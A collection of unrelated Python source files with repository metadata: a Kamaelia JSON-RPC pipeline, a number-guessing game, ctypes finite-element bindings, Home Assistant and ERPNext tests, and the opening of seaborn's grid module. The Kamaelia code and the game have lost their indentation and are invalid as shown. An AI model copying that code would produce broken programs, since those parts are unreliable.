Json_strings, self.partial_data = json_split(self.partial_data + data)
yield 1
# send to dispatch
for message in Json_strings:
if self.debug >= 3: print 'Sent to deserializer: %s' % message
self.send(message, 'outbox')
yield 1
if not self.anyReady():
self.pause()
yield 1
if self.debug >= 3:
print 'End of main for %s' % self.__class__.__name__
def shutdown(self):
if self.dataReady('control'):
msg = self.recv('control')
if isinstance(msg, shutdownMicroprocess) or isinstance(msg, producerFinished):
if self.debug >= 3: print '%s got shutdown msg: %r' % (self.__class__.__name__, msg)
self.send(msg, 'signal')
return True
return False
class Deserializer(Axon.Component.component):
Inboxes = {'inbox': 'complete json strings',
'control': 'shutdown messages',
}
Outboxes = {'outbox': 'the deserialized request/notification or result',
'error': 'the exception if there was an error deserializing',
'signal': 'shutdown messages',
}
def __init__(self, **kwargs):
super(Deserializer, self).__init__(**kwargs)
self.serializer = JsonRpc20() # FIXME: make this a paramater
if self.debug >= 3: print 'Created %s' % repr(self)
def main(self):
while not self.shutdown():
if self.dataReady('inbox'):
data = self.recv('inbox')
if self.debug >=1: print '--> %s' % data
try:
request = self.serializer.loads_request_response(data)
self.send(request, 'outbox')
except RPCFault, error:
self.send( (error, None), 'error')
if not self.anyReady():
self.pause()
yield 1
if self.debug >= 3:
print 'End of main for %s' % self.__class__.__name__
def shutdown(self):
if self.dataReady('control'):
msg = self.recv('control')
if isinstance(msg, shutdownMicroprocess) or isinstance(msg, producerFinished):
if self.debug >= 3: print '%s got shutdown msg: %r' % (self.__class__.__name__, msg)
self.send(msg, 'signal')
return True
return False
class CallbackProxy(object):
def __init__(self, method_name, response_callback):
self.method_name = method_name
self.response_callback = response_callback
self.params = None
self.component = None
self.outbox_name = None
def set_outbox(self, component, outbox_name):
self.component = component
self.outbox_name = outbox_name
def __call__(self, params = None):
if not self.component or not self.outbox_name:
raise ValueError('component or outbox_name not set')
req = RequestOrNotification(self.method_name, params, self.response_callback)
self.component.send(req, self.outbox_name)
class Dispatcher(Axon.Component.component):
Inboxes = {'inbox': 'rpc request/notification or response objects',
'result_in': 'the function/method result or RequestOrNotification',
'control': 'shutdown messages',
}
Outboxes = {'outbox': '(return_component, method, args, id) tuple for the worker. NOTE: return_component == (self, <boxname>)',
'result_out': 'the result of the request (relayed from result_in)',
'request_out': 'requests from callback functions',
'signal': 'shutdown messages',
'wake_requester': 'wake up RequestSerializer',
}
def __init__(self, **kwargs):
super(Dispatcher, self).__init__(**kwargs)
if self.debug >= 3: print 'Created %s' % repr(self)
def _do_dispatch(self, dispatch_func, args, id, notification, convert_args = True):
'Assumes args is always a list, tuple or dict'
kwargs = {}
if convert_args:
if isinstance(args, dict):
# args by name
args, kwargs = [], args
# find any callback args and replace with callback proxy
for arg_name in set(self.factory.callback_table[dispatch_func].keys()).intersection(set(kwargs.keys())):
kwargs[arg_name] = CallbackProxy(kwargs[arg_name], self.factory.callback_table[dispatch_func][arg_name])
else:
arg_nums = range(len(args))
for arg_num in set(self.factory.callback_table[dispatch_func].keys()).intersection(set(arg_nums)):
args[arg_num] = CallbackProxy(args[arg_num], self.factory.callback_table[dispatch_func][arg_num])
else:
args = [args]
return_box = (self, 'result_in')
dispatch_info = (dispatch_func, args, kwargs)
return_info = (id, notification)
if self.debug >= 3: print 'Sending: %r\n%r\n%r' % (return_box, dispatch_info, return_info)
self.send( (return_box, dispatch_info, return_info), 'outbox')
def _process_request(self, request):
if self.debug >= 3: print 'Got dispatch request: %s' % repr(request)
notification = False
if len(request) == 2:
notification = True
method, args = request
id = None
else:
method, args, id = request
if not notification and method not in self.factory.dispatch_table:
response = ( RPCFault(METHOD_NOT_FOUND, ERROR_MESSAGE[METHOD_NOT_FOUND]), id)
self.send(response, 'result_out')
else:
dispatch_func = self.factory.dispatch_table[method]
self._do_dispatch(dispatch_func, args, id, notification)
def _process_response(self, response):
print '=== Response: %s ===' % repr(response)
result, id = response
response_callback = None
if id == self.factory.requests_on_connect_wait:
self.factory.requests_on_connect_wait = None # clear waiting on this request
if len(self.factory.requests_on_connect):
self.send(Axon.Ipc.notify(self, id), 'wake_requester') # wake requester so it can send pending requests
# look up response callback
try:
response_callback = self.factory.requests_sent.pop(id)
assert isinstance(response_callback, ResponseCallback)
except KeyError:
print 'ERROR: Invalid response id %s' % id
if result is None:
return
if response_callback.convert_args and type(result) not in (types.ListType, types.TupleType, types.DictionaryType):
print "ERROR: Can't convert response result to procedure argments - must be List, Tuple or Dict"
return
if not response_callback:
print 'ERROR: Got result for a notification or request with no callback defined'
else:
self._do_dispatch(response_callback.callback_func, result, id, True, convert_args = response_callback.convert_args) # not really a notification - but we don't return a response to a response
def main(self):
while not self.shutdown():
if self.dataReady('inbox'):
data = self.recv('inbox')
if data[0] == REQUEST:
request = data[1]
self._process_request(request)
elif data[0] == RESPONSE:
# got a response to a request we sent
response = data[1]
self._process_response(response)
elif data[0] == ERROR:
# FIXME: handle error responses
print '!!! GOT ERROR RESPONSE: %s' % repr(data[1])
else:
# FIXME
print 'INTERNAL ERROR: Unexpected message type'
if self.dataReady('result_in'):
data = self.recv('result_in')
result, (id, notification) = data
if isinstance(result, RequestOrNotification):
if self.debug >= 3: print 'Got RequestOrNotification: %s' % result
self.send(result, 'request_out')
else:
if self.debug >= 2: print 'Got result for id %s:\n %s' % (id, repr(result))
if not notification:
self.send((result, id), 'result_out')
if not self.anyReady():
self.pause()
yield 1
if self.debug >= 3:
print 'End of main for %s' % self.__class__.__name__
def shutdown(self):
if self.dataReady('control'):
msg = self.recv('control')
if isinstance(msg, shutdownMicroprocess) or isinstance(msg, producerFinished):
if self.debug >= 3: print '%s got shutdown msg: %r' % (self.__class__.__name__, msg)
self.send(msg, 'signal')
return True
return False
class ResponseSerializer(Axon.Component.component):
Inboxes = {'inbox': '(result, id) tuple',
'control': 'shutdown messages',
}
Outboxes = {'outbox': 'the json-rpc response',
'signal': 'shutdown messages',
}
def __init__(self, **kwargs):
super(ResponseSerializer, self).__init__(**kwargs)
self.serializer = JsonRpc20() # FIXME: make this a paramater
if self.debug >= 3: print 'Created %s' % repr(self)
def main(self):
while not self.shutdown():
if self.dataReady('inbox'):
result, id = self.recv('inbox')
if self.debug >= 3: print 'Got result. Id: %r, Value: %r' % (id, result)
if isinstance(result, RPCFault):
response = self.serializer.dumps_error( result, id)
elif isinstance(result, Exception):
# procedure exception - FIXME: log to logger!
print format_exc()
response = self.serializer.dumps_error( RPCFault(INTERNAL_ERROR, ERROR_MESSAGE[INTERNAL_ERROR]), id )
else:
try:
response = self.serializer.dumps_response(result, id)
except RPCFault, e:
response = self.serializer.dumps_error( e, id)
# serialization error - log to logger!
print format_exc()
response = self.serializer.dumps_error( RPCFault(INTERNAL_ERROR, ERROR_MESSAGE[INTERNAL_ERROR]), id )
response += '\r\n' # make things easier to read if testing with telnet or netcat
if self.debug >= 1:
print '<-- %s' % response
self.send(response, 'outbox')
if not self.anyReady():
self.pause()
yield 1
if self.debug >= 3:
print 'End of main for %s' % self.__class__.__name__
def shutdown(self):
if self.dataReady('control'):
msg = self.recv('control')
if isinstance(msg, shutdownMicroprocess) or isinstance(msg, producerFinished):
if self.debug >= 3: print '%s got shutdown msg: %r' % (self.__class__.__name__, msg)
self.send(msg, 'signal')
return True
return False
class RequestSerializer(Axon.Component.component):
Inboxes = {'inbox': 'not used',
'request' : 'incoming RequestOrNotification objects',
'control': 'wakeup & shutdown messages',
}
Outboxes = {'outbox': 'the json-rpc request / notification',
'signal': 'shutdown messages',
}
def __init__(self, **kwargs):
super(RequestSerializer, self).__init__(**kwargs)
self.serializer = JsonRpc20() # FIXME: make this a paramater
if self.debug >= 3: print 'Created %s' % repr(self)
def _send_req_or_notification(self, req, wait = False):
assert isinstance(req, RequestOrNotification)
if req.response_callback:
id = self.factory.get_request_id(req) # this adds the id to self.requests_sent
if wait:
self.factory.requests_on_connect_wait = id
output = self.serializer.dumps_request(req.method, req.params, id) if req.params \
else self.serializer.dumps_request(req.method, id = id)
else:
output = self.serializer.dumps_notification(req.method, req.params) if req.params \
else self.serializer.dumps_notification(req.method)
output += '\r\n' # make things easier to read if testing with telnet or netcat
if self.debug >= 1: print '<-- %s' % output
self.send(output, 'outbox')
def main(self):
while not self.shutdown():
if len(self.factory.requests_on_connect) and not self.factory.requests_on_connect_wait:
request, wait = self.factory.requests_on_connect.pop(0)
self._send_req_or_notification(request, wait)
if self.dataReady('request'):
req = self.recv('request')
self._send_req_or_notification(req)
if not self.anyReady() and (len(self.factory.requests_on_connect) == 0 or self.factory.requests_on_connect_wait) :
self.pause()
yield 1
if self.debug >= 3:
print 'End of main for %s' % self.__class__.__name__
def shutdown(self):
if self.dataReady('control'):
msg = self.recv('control')
if isinstance(msg, shutdownMicroprocess) or isinstance(msg, producerFinished):
if self.debug >= 3: print '%s got shutdown msg: %r' % (self.__class__.__name__, msg)
self.send(msg, 'signal')
return True
return False
class Finalizer(Axon.Component.component):
Inboxes = {'inbox': 'not used',
'control': 'shutdown messages',
}
Outboxes = {'outbox': 'not used',
'signal': 'shutdown messages',
}
def __init__(self, **kwargs):
super(Finalizer, self).__init__(**kwargs)
if self.debug >= 3: print 'Created %s' % repr(self)
def main(self):
while not self.shutdown():
if not self.anyReady():
self.pause()
yield 1
if self.debug >= 3:
print 'End of main for %s' % self.__class__.__name__
def shutdown(self):
if self.dataReady('control'):
msg = self.recv('control')
if isinstance(msg, shutdownMicroprocess) or isinstance(msg, producerFinished):
if self.debug >= 3: print '%s got shutdown msg: %r' % (self.__class__.__name__, msg)
# FIXME: Log any outstanding request reponses missing
print 'Connection is being closed'
for req_id in self.factory.requests_sent:
print 'WARNING: No response seen to request %s' % req_id
self.send(msg, 'signal')
return True
return False
# -------------------------------------------
def ThreadedTaskRunner(num_workers = 5, debug = 0):
worker_list = []
for dummy in range(num_workers):
worker = ThreadedWorker(debug = debug)
worker.activate()
worker_list.append(worker)
manager = TaskManager(worker_list, debug = debug)
return manager
class ThreadedWorker(Axon.ThreadedComponent.threadedcomponent):
Inboxes = {'inbox': '(function, args, kwargs) tuple',
'control': 'shutdown messages',
}
Outboxes = {'outbox': 'the result or exception or callback request',
'signal': 'shutdown messages',
}
def __init__(self, **kwargs):
super(ThreadedWorker, self).__init__(**kwargs)
if self.debug >= 3: print 'Created %s' % repr(self)
def main(self):
while not self.shutdown():
if self.dataReady('inbox'):
func, args, kwargs = self.recv('inbox')
for arg in args:
if isinstance(arg, CallbackProxy):
arg.set_outbox(self, 'outbox')
for arg_name in kwargs:
if isinstance(kwargs[arg_name], CallbackProxy):
kwargs[arg_name].set_outbox(self, 'outbox')
if self.debug >= 3: print 'Worker %s got data: %r, %r, %r' % (id(self), func, args, kwargs)
try:
result = func(*args, **kwargs)
except Exception, error:
result = error
if self.debug >= 3: print 'Worker %s got result: %r' % (id(self), result)
self.send(result, 'outbox')
if not self.anyReady():
self.pause()
if self.debug >= 3:
print 'End of main for %s' % self.__class__.__name__
def shutdown(self):
if self.dataReady('control'):
msg = self.recv('control')
if isinstance(msg, shutdownMicroprocess) or isinstance(msg, producerFinished):
if self.debug >= 3: print '%s got shutdown msg: %r' % (self.__class__.__name__, msg)
self.send(msg, 'signal')
return True
return False
class TaskManager(Axon.AdaptiveCommsComponent.AdaptiveCommsComponent):
Inboxes = {'inbox': '(return_box, dispatch_info, return_info) tuple',
'control': 'shutdown messages',
}
Outboxes = {'outbox': 'not used',
'signal': 'shutdown messages',
}
'''
return_box = (<sending_component>, <return_box_name>)
dispatch_info = (self.factory.dispatch_table[method], args, kwargs)
return_info = (id, notification)
'''
def __init__(self, workers, debug = 0):
super(TaskManager, self).__init__()
self.debug = debug
self.workers = workers # a list of worker components
self.task_data = [ None for x in range(len(workers)) ] # an available worker has None here
self.work_queue = []
self.worker_box_names = []
self.links = []
# make connections to the workers
for worker_num in range(len(self.workers)):
outbox_name = self.addOutbox('to_worker_%s' % worker_num)
inbox_name = self.addInbox('from_worker_%s' % worker_num)
signal_name = self.addOutbox('signal_worker_%s' % worker_num)
boxnames = {'to': outbox_name, 'from': inbox_name, 'signal': signal_name}
self.worker_box_names.append(boxnames)
outlink = self.link((self, outbox_name), (self.workers[worker_num], 'inbox'))
control_link = self.link((self, signal_name), (self.workers[worker_num], 'control'))
inlink = self.link((self.workers[worker_num], 'outbox'), (self, inbox_name))
self.links.append((outlink, control_link, inlink))
if self.debug >= 3: print 'Created %s' % repr(self)
def main(self):
while not self.shutdown():
if self.dataReady('inbox'):
data = self.recv('inbox')
if self.debug >= 3: print 'Task Manager got data: %s' % repr(data)
self.work_queue.append(data)
if len(self.work_queue) != 0 and None in self.task_data:
return_box, dispatch_info, return_info = self.work_queue.pop(0)
result_box_name = self.addOutbox('%s-%s-%s' % (id(return_box), id(dispatch_info), id(return_info)))
self.link((self, result_box_name), return_box)
worker_num = self.task_data.index(None) # pick the first free worker
self.task_data[worker_num] = (result_box_name, return_box, return_info)
if self.debug >= 3:
print 'Sending task data to worker %s (box %s)' % (worker_num, self.worker_box_names[worker_num]['to'])
print 'Dispatch:', dispatch_info
self.send(dispatch_info, self.worker_box_names[worker_num]['to'])
if self.anyReady():
for worker_num in range(len(self.workers)):
boxname = self.worker_box_names[worker_num]['from']
if self.dataReady(boxname):
data = self.recv(boxname)
if self.debug >= 3: print 'TaskManager got data %r on boxname %s' % (data, boxname)
result_box_name, return_box, return_info = self.task_data[worker_num]
self.send( (data, return_info), result_box_name) # post the result
if not isinstance(data, RequestOrNotification):
if self.debug >= 3: print '** Doing unlink ** on %s' % result_box_name
self.unlink( (self, result_box_name), return_box)
self.deleteOutbox(result_box_name)
self.task_data[worker_num] = None # mark that worker as done
yield 1
if not self.anyReady():
self.pause()
yield 1
if self.debug >= 3:
print 'End of main for %s' % self.__class__.__name__
def shutdown(self):
if self.dataReady('control'):
msg = self.recv('control')
if isinstance(msg, shutdownMicroprocess) or isinstance(msg, producerFinished):
if self.debug >= 3: print '%s got shutdown msg: %r' % (self.__class__.__name__, msg)
for boxnames in self.worker_box_names:
self.send(msg, boxnames['signal'])
self.send(msg, 'signal')
return True
return False
class JsonRPCBase(object):
'Base class for JsonRPC clients and servers'
def __init__(self, workers, debug):
self.workers = workers
self.debug = debug
taskrunner = ThreadedTaskRunner(num_workers = self.workers, debug = self.debug)
self.jsonprotocol = JsonRpcProtocol(taskrunner, debug = self.debug)
def add_function(self, func):
self.jsonprotocol.add_function(func)
def add_instance(self, instance):
self.jsonprotocol.add_instance(instance)
def add_request_on_connect(self, req_or_notification, wait = True):
self.jsonprotocol.add_request_on_connect(req_or_notification, wait)
class JsonRpcTCPServer(JsonRPCBase):
def __init__(self, portnumber, workers = 5, debug = 1):
JsonRPCBase.__init__(self, workers = workers, debug = debug)
self.portnumber = portnumber
self.server = None
def start(self):
if self.debug: print 'Starting JSON-RPC server on port %s' % self.portnumber
self.server = ServerCore( protocol = self.jsonprotocol, port = self.portnumber )
self.server.run()
#FIXME: some way to stop!
class JsonRpcTCPClient(JsonRPCBase):
def __init__(self, host, portnumber, delay = 0, workers = 5, debug = 1):
JsonRPCBase.__init__(self, workers = workers, debug = debug)
self.host = host
self.portnumber = portnumber
self.delay = delay
self.client = Graphline(
TCPCLIENT = TCPClient(self.host, self.portnumber, self.delay),
PROTOCOL = self.jsonprotocol(),
linkages = { ('TCPCLIENT', 'outbox') : ('PROTOCOL', 'inbox'),
('PROTOCOL', 'outbox') : ('TCPCLIENT', 'inbox'),
('TCPCLIENT', 'signal') : ('PROTOCOL', 'control'),
('PROTOCOL', 'signal') : ('TCPCLIENT', 'control'),
} )
self.handle = Handle(self.client)
def start(self):
if self.debug: print 'Starting TCP Client - connecting to %s on port %s' % (self.host, self.portnumber)
##self.client.run()
try:
background().start()
except:
pass # assume already running
self.client.activate()
class Proxy(object):
def __init__(self, host, portnumber, delay = 0, threaded = True, workers = 5, debug = 1):
self.host = host
self.portnumber = portnumber
self.delay = delay
self.threaded = threaded
self.workers = workers
self.debug = debug
self.client = JsonRpcTCPClient(host = host, portnumber = portnumber, delay = delay, threaded = True, workers = workers,
debug = debug)
self.request = RequestProxy(self.client, True)
self.notification = RequestProxy(self.client, False)
class RequestProxy(object):
def __init__(self, client, request = True):
self.client = client
self.request = request
def _remote_call(self, name, params):
client = self.client
|
sparkslabs/kamaelia_
|
Sketches/MPS/BugReports/FixTests/Kamaelia/Kamaelia/Apps/JsonRPC/BDJsonRPC.py
|
Python
|
apache-2.0
| 35,300
| 0.013059
|
'''
笔记
for i in range(10):
#3次机会问一次
'''
age=22
c=0
while True:
if c<3:
cai=input("请输入要猜的年龄:")
if cai.isdigit(): #判断是否为整数
print("格式正确")
cai1=int(cai) #判断为整数把输入的变量变成int型
if cai1==age and c<3:
print("猜对了")
break
elif cai1>age and c<3:
print("猜大了")
c+=1
elif cai1<age and c<3:
print("猜小了")
c+=1
else: #判断是否为整数
print("输入格式不正确")
else:
p=input("次数用完,是否要继续,继续请按:yes,不想继续请按no:")
if p=="yes":
c=0
cai=input("请输入要猜的年龄:")
if cai.isdigit(): #判断是否为整数
print("格式正确2")
cai1=int(cai) #判断为整数把输入的变量变成int型
if cai1==age and c<3:
print("猜对了")
break
elif cai1>age and c<3:
print("猜大了")
c+=1
elif cai1<age and c<3:
print("猜小了")
c+=1
else: #判断是否为整数
print("输入格式不正确")
elif p=="no":
print("你选择了退出 bye bye")
break
|
xiaoyongaa/ALL
|
python基础2周/17猜年龄游戏.py
|
Python
|
apache-2.0
| 1,545
| 0.027353
|
import numpy as np
from ctypes import (
CDLL,
POINTER,
ARRAY,
c_void_p,
c_int,
byref,
c_double,
c_char,
c_char_p,
create_string_buffer,
)
from numpy.ctypeslib import ndpointer
import sys, os
prefix = {"win32": "lib"}.get(sys.platform, "lib")
extension = {"darwin": ".dylib", "win32": ".dll"}.get(sys.platform, ".so")
dir_lib = {"win32": "bin"}.get(sys.platform, "lib")
libcore = CDLL(os.path.join("build", dir_lib, prefix + "core" + extension))
def set_assembleElementalMatrix2D_c_args(N):
"""
Assign function and set the input arguement types for a 2D elemental matrix
(int, int, int, c_double(N), c_double(N,N))
"""
f = libcore.assembleElementalMatrix2D_c
f.argtypes = [
c_int,
c_int,
c_int,
ndpointer(shape=(N, 2), dtype="double", flags="F"),
ndpointer(shape=(N, N), dtype="double", flags="F"),
]
f.restype = None
return f
def set_create_simple_array_c_args(N):
"""
Assign function and set arguement types of a simple array
"""
f = libcore.create_simple_array_c
f.argtypes = [ndpointer(shape=(N, N), dtype="double", flags="F")]
f.restype = None
return f
def set_assembleElementalMatrix1D_args(N):
"""
Assign function and set the input arguement types for a 1D elemental matrix
(int, int, int, c_double(N), c_double(N,N))
"""
f = libcore.assembleElementalMatrix1D_c
f.argtypes = [
c_int,
c_int,
c_int,
ndpointer(shape=(N,), dtype="double", flags="F"),
ndpointer(shape=(N, N), dtype="double", flags="F"),
]
f.restype = None
return f
def set_assemble1D_c_args(num_cells, num_pts_per_cell, num_pts):
"""
Assign function and set the input arguement types for assembling a full 1D
matrix
(int, int, int, c_double(N), c_double(N1,N2), c_double, c_double, c_double(N,N))
"""
f = libcore.assemble1D_c
f.argtypes = [
c_int,
c_int,
c_int,
ndpointer(shape=(num_pts,), dtype="double", flags="F"),
ndpointer(shape=(num_cells, num_pts_per_cell), dtype="int32", flags="F"),
c_double,
c_double,
ndpointer(shape=(num_pts, num_pts), dtype="double", flags="F"),
]
f.restype = None
return f
def set_assemble2D_c_args(num_cells, num_pts_per_cell, num_pts):
"""
Assign function and set the input arguement types for assembling a full 2D
matrix
(int, int, int, c_double(N), c_double(N,N))
"""
f = libcore.assemble2D_c
f.argtypes = [
c_int,
c_int,
c_int,
ndpointer(shape=(num_pts, 2), dtype="double", flags="F"),
ndpointer(shape=(num_cells, num_pts_per_cell), dtype="int32", flags="F"),
c_double,
ndpointer(shape=(2,), dtype="double", flags="F"),
ndpointer(shape=(num_pts, num_pts), dtype="double", flags="F"),
]
f.restype = None
return f
def set_pascal_single_row_args(N):
"""
Assign the arguments for arrays pascal rows
"""
f = libcore.pascal_single_row_c
f.argtypes = [
c_int,
c_double,
c_double,
ndpointer(shape=(N + 1,), dtype="double", flags="F"),
]
f.restype = None
return f
def set_pascal_2D_quad_c_args(N):
"""
Assign arguements for full (quadrilateral) pascal lines
"""
f = libcore.pascal_2D_quad_c
f.argtypes = [
c_int,
c_double,
c_double,
ndpointer(shape=((N + 1) ** 2,), dtype="double", flags="F"),
]
f.restype = None
return f
def pascal_2D_single_row(N, x, y):
xs = np.array([np.power(x, N - ii) for ii in range(N + 1)])
ys = np.array([np.power(y, ii) for ii in range(N + 1)])
return xs * ys
def pascal_2D_post_row(N, ii, x, y):
temp = pascal_2D_single_row(ii, x, y)
return temp[ii - N : N + 1]
def pascal_2D_total_row(N, x, y):
temp_pre = [pascal_2D_single_row(ii, x, y) for ii in range(N + 1)]
temp_post = [pascal_2D_post_row(N, ii, x, y) for ii in range(N + 1, 2 * N + 1)]
row = temp_pre + temp_post
return np.concatenate(row)
|
cbcoutinho/learn_dg
|
tests/helpers.py
|
Python
|
bsd-2-clause
| 4,156
| 0.001444
|
# Copyright (c) 2021, Frappe Technologies Pvt. Ltd. and Contributors
# See license.txt
# import frappe
import unittest
class TestCampaign(unittest.TestCase):
pass
|
mhbu50/erpnext
|
erpnext/crm/doctype/campaign/test_campaign.py
|
Python
|
gpl-3.0
| 167
| 0.005988
|
"""Make sure that existing Koogeek LS1 support isn't broken."""
from datetime import timedelta
from unittest import mock
from aiohomekit.exceptions import AccessoryDisconnectedError, EncryptionError
from aiohomekit.testing import FakePairing
import pytest
from homeassistant.components.light import SUPPORT_BRIGHTNESS, SUPPORT_COLOR
from homeassistant.helpers import device_registry as dr, entity_registry as er
import homeassistant.util.dt as dt_util
from tests.common import async_fire_time_changed
from tests.components.homekit_controller.common import (
Helper,
setup_accessories_from_file,
setup_test_accessories,
)
LIGHT_ON = ("lightbulb", "on")
async def test_koogeek_ls1_setup(hass):
"""Test that a Koogeek LS1 can be correctly setup in HA."""
accessories = await setup_accessories_from_file(hass, "koogeek_ls1.json")
config_entry, pairing = await setup_test_accessories(hass, accessories)
entity_registry = er.async_get(hass)
# Assert that the entity is correctly added to the entity registry
entry = entity_registry.async_get("light.koogeek_ls1_20833f")
assert entry.unique_id == "homekit-AAAA011111111111-7"
helper = Helper(
hass, "light.koogeek_ls1_20833f", pairing, accessories[0], config_entry
)
state = await helper.poll_and_get_state()
# Assert that the friendly name is detected correctly
assert state.attributes["friendly_name"] == "Koogeek-LS1-20833F"
# Assert that all optional features the LS1 supports are detected
assert state.attributes["supported_features"] == (
SUPPORT_BRIGHTNESS | SUPPORT_COLOR
)
device_registry = dr.async_get(hass)
device = device_registry.async_get(entry.device_id)
assert device.manufacturer == "Koogeek"
assert device.name == "Koogeek-LS1-20833F"
assert device.model == "LS1"
assert device.sw_version == "2.2.15"
assert device.via_device_id is None
@pytest.mark.parametrize("failure_cls", [AccessoryDisconnectedError, EncryptionError])
async def test_recover_from_failure(hass, utcnow, failure_cls):
"""
Test that entity actually recovers from a network connection drop.
See https://github.com/home-assistant/core/issues/18949
"""
accessories = await setup_accessories_from_file(hass, "koogeek_ls1.json")
config_entry, pairing = await setup_test_accessories(hass, accessories)
helper = Helper(
hass, "light.koogeek_ls1_20833f", pairing, accessories[0], config_entry
)
# Set light state on fake device to off
helper.characteristics[LIGHT_ON].set_value(False)
# Test that entity starts off in a known state
state = await helper.poll_and_get_state()
assert state.state == "off"
# Set light state on fake device to on
helper.characteristics[LIGHT_ON].set_value(True)
# Test that entity remains in the same state if there is a network error
next_update = dt_util.utcnow() + timedelta(seconds=60)
with mock.patch.object(FakePairing, "get_characteristics") as get_char:
get_char.side_effect = failure_cls("Disconnected")
state = await helper.poll_and_get_state()
assert state.state == "off"
chars = get_char.call_args[0][0]
assert set(chars) == {(1, 8), (1, 9), (1, 10), (1, 11)}
# Test that entity changes state when network error goes away
next_update += timedelta(seconds=60)
async_fire_time_changed(hass, next_update)
await hass.async_block_till_done()
state = await helper.poll_and_get_state()
assert state.state == "on"
|
w1ll1am23/home-assistant
|
tests/components/homekit_controller/specific_devices/test_koogeek_ls1.py
|
Python
|
apache-2.0
| 3,555
| 0.000281
|
from itertools import product
from inspect import signature
import warnings
from textwrap import dedent
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
from ._core import VectorPlotter, variable_type, categorical_order
from . import utils
from .utils import _check_argument, adjust_legend_subtitles, _draw_figure
from .palettes import color_palette, blend_palette
from ._decorators import _deprecate_positional_args
from ._docstrings import (
DocstringComponents,
_core_docs,
)
__all__ = ["FacetGrid", "PairGrid", "JointGrid", "pairplot", "jointplot"]
_param_docs = DocstringComponents.from_nested_components(
core=_core_docs["params"],
)
class _BaseGrid:
"""Base class for grids of subplots."""
def set(self, **kwargs):
"""Set attributes on each subplot Axes."""
for ax in self.axes.flat:
if ax is not None: # Handle removed axes
ax.set(**kwargs)
return self
@property
def fig(self):
"""DEPRECATED: prefer the `figure` property."""
# Grid.figure is preferred because it matches the Axes attribute name.
# But as the maintanace burden on having this property is minimal,
# let's be slow about formally deprecating it. For now just note its deprecation
# in the docstring; add a warning in version 0.13, and eventually remove it.
return self._figure
@property
def figure(self):
"""Access the :class:`matplotlib.figure.Figure` object underlying the grid."""
return self._figure
def savefig(self, *args, **kwargs):
"""
Save an image of the plot.
This wraps :meth:`matplotlib.figure.Figure.savefig`, using bbox_inches="tight"
by default. Parameters are passed through to the matplotlib function.
"""
kwargs = kwargs.copy()
kwargs.setdefault("bbox_inches", "tight")
self.figure.savefig(*args, **kwargs)
class Grid(_BaseGrid):
"""A grid that can have multiple subplots and an external legend."""
_margin_titles = False
_legend_out = True
def __init__(self):
self._tight_layout_rect = [0, 0, 1, 1]
self._tight_layout_pad = None
# This attribute is set externally and is a hack to handle newer functions that
# don't add proxy artists onto the Axes. We need an overall cleaner approach.
self._extract_legend_handles = False
def tight_layout(self, *args, **kwargs):
"""Call fig.tight_layout within rect that exclude the legend."""
kwargs = kwargs.copy()
kwargs.setdefault("rect", self._tight_layout_rect)
if self._tight_layout_pad is not None:
kwargs.setdefault("pad", self._tight_layout_pad)
self._figure.tight_layout(*args, **kwargs)
def add_legend(self, legend_data=None, title=None, label_order=None,
adjust_subtitles=False, **kwargs):
"""Draw a legend, maybe placing it outside axes and resizing the figure.
Parameters
----------
legend_data : dict
Dictionary mapping label names (or two-element tuples where the
second element is a label name) to matplotlib artist handles. The
default reads from ``self._legend_data``.
title : string
Title for the legend. The default reads from ``self._hue_var``.
label_order : list of labels
The order that the legend entries should appear in. The default
reads from ``self.hue_names``.
adjust_subtitles : bool
If True, modify entries with invisible artists to left-align
the labels and set the font size to that of a title.
kwargs : key, value pairings
Other keyword arguments are passed to the underlying legend methods
on the Figure or Axes object.
Returns
-------
self : Grid instance
Returns self for easy chaining.
"""
# Find the data for the legend
if legend_data is None:
legend_data = self._legend_data
if label_order is None:
if self.hue_names is None:
label_order = list(legend_data.keys())
else:
label_order = list(map(utils.to_utf8, self.hue_names))
blank_handle = mpl.patches.Patch(alpha=0, linewidth=0)
handles = [legend_data.get(l, blank_handle) for l in label_order]
title = self._hue_var if title is None else title
title_size = mpl.rcParams["legend.title_fontsize"]
# Unpack nested labels from a hierarchical legend
labels = []
for entry in label_order:
if isinstance(entry, tuple):
_, label = entry
else:
label = entry
labels.append(label)
# Set default legend kwargs
kwargs.setdefault("scatterpoints", 1)
if self._legend_out:
kwargs.setdefault("frameon", False)
kwargs.setdefault("loc", "center right")
# Draw a full-figure legend outside the grid
figlegend = self._figure.legend(handles, labels, **kwargs)
self._legend = figlegend
figlegend.set_title(title, prop={"size": title_size})
if adjust_subtitles:
adjust_legend_subtitles(figlegend)
# Draw the plot to set the bounding boxes correctly
_draw_figure(self._figure)
# Calculate and set the new width of the figure so the legend fits
legend_width = figlegend.get_window_extent().width / self._figure.dpi
fig_width, fig_height = self._figure.get_size_inches()
self._figure.set_size_inches(fig_width + legend_width, fig_height)
# Draw the plot again to get the new transformations
_draw_figure(self._figure)
# Now calculate how much space we need on the right side
legend_width = figlegend.get_window_extent().width / self._figure.dpi
space_needed = legend_width / (fig_width + legend_width)
margin = .04 if self._margin_titles else .01
self._space_needed = margin + space_needed
right = 1 - self._space_needed
# Place the subplot axes to give space for the legend
self._figure.subplots_adjust(right=right)
self._tight_layout_rect[2] = right
else:
# Draw a legend in the first axis
ax = self.axes.flat[0]
kwargs.setdefault("loc", "best")
leg = ax.legend(handles, labels, **kwargs)
leg.set_title(title, prop={"size": title_size})
self._legend = leg
if adjust_subtitles:
adjust_legend_subtitles(leg)
return self
def _update_legend_data(self, ax):
"""Extract the legend data from an axes object and save it."""
data = {}
# Get data directly from the legend, which is necessary
# for newer functions that don't add labeled proxy artists
if ax.legend_ is not None and self._extract_legend_handles:
handles = ax.legend_.legendHandles
labels = [t.get_text() for t in ax.legend_.texts]
data.update({l: h for h, l in zip(handles, labels)})
handles, labels = ax.get_legend_handles_labels()
data.update({l: h for h, l in zip(handles, labels)})
self._legend_data.update(data)
# Now clear the legend
ax.legend_ = None
def _get_palette(self, data, hue, hue_order, palette):
"""Get a list of colors for the hue variable."""
if hue is None:
palette = color_palette(n_colors=1)
else:
hue_names = categorical_order(data[hue], hue_order)
n_colors = len(hue_names)
# By default use either the current color palette or HUSL
if palette is None:
current_palette = utils.get_color_cycle()
if n_colors > len(current_palette):
colors = color_palette("husl", n_colors)
else:
colors = color_palette(n_colors=n_colors)
# Allow for palette to map from hue variable names
elif isinstance(palette, dict):
color_names = [palette[h] for h in hue_names]
colors = color_palette(color_names, n_colors)
# Otherwise act as if we just got a list of colors
else:
colors = color_palette(palette, n_colors)
palette = color_palette(colors, n_colors)
return palette
@property
